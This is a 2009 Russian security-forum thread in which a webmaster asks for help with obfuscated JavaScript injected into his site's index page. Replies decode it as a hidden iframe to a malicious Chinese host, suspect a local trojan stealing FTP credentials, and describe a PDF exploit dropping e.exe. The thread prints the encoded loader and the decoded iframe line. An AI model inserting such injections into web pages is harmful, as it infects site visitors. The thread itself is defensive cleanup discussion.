Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вредоносный код на сайте!!! (https://forum.antichat.xyz/showthread.php?t=125364)

mff 15.06.2009 13:32

Вредоносный код на сайте!!!
 
Добрый день, дорогие форумчане! :)
Вобщем вот такая произошла у меня ситуация, захожу с утра на сайт, а там ошибка. Ни кто ничего не трогал, всё работало, хостер надёжный. Полез по ftp, в индексе вот такую заразу вырезал:
Код HTML:

<script language="javascript">
document.write(unescape(' %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%75%62%61%35%2E%63%6E%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E '));
</script>

:mad:

Такая же вата была, когда я работал в студии Веб дизайна. Я чистил каждый день сайты.
В корне, во всех файлах, был добавлен подобный код. С утра приходишь - то же самое.
Что они только не делали, и меняли ftp клиента и виндовс и по 3 антивиря на машину - ни чего не помогало.
Прошу вашей помощи, помогите разобраться, что, к чему. :confused:

Спасибо!

diehard 15.06.2009 13:36

напиши УРЛ сайта, все из базы удалят :)

Pashkela 15.06.2009 13:37

Скорее всего вирус локальный (на твоем домашнем компе, или откуда ты там по фтп заходишь). А вообще вариантов миллиард и еще один

ph1l1ster 15.06.2009 13:38

Код:

<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>
хорошо чистиш? ищи шеллы, меня пассы, или на компе у тебя локальный трой

mff 15.06.2009 18:05

Пару троев грохнул! Пасы сменил.

Tigger 15.06.2009 18:41

Может в каком-нить файле шелл просто?

mff 15.06.2009 18:59

Tigger, можиет, но как узнать?

Tigger 15.06.2009 19:06

Проверяй каждый файл на наличие вредоносного кода.

POS_troi 15.06.2009 19:15

Цитата:

можиет, но как узнать?
для начала с автора нужно вытащить инфу о версии двига =)

Dobby007 15.06.2009 19:19

То что это шелл - врятли...
Это скорее троянчик... причем недавно сделаннный...

Код:

<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>
Открыл я этот сайт... Вот че получается. ПРи зарузке ентого сайтика грузится PDF документ прямо в браузере. Затем этот PDF документ каким-то образом загружает на комп основную вирусяку e.exe, которая сохраняется в папке C:\Documents and Settings\{USER}\Local Settings\Temp и опять же как-то запускает ее (КАК!?). Вот отчеты по e.exe:
Код:

http://www.virustotal.com/ru/analisis/0f51e07788d3f945d6b94b83c03d83c136a287ad9545c07ae58aa1d152fa8c1b-1245078728
Это лично у меня так было. Можете конечно сами попробывать, если хотите.
Когда открыл сайт подумал вначале, что хрень какая-та (PDF документа как такогого там нет, просто грузится плагин PDF Reader'a в опере)... Так бы наверное он у меня и висел (ну всмысле вирусяка), если бы винда не выдала НЕ ОТПРАВЛЯТЬ по истечению какого-то времени :)

P.S. Так бы подумал что просто типо счетчик.... Кому-то надо посетителей нагонять, а здесь оказывается все круче =))


Время: 11:59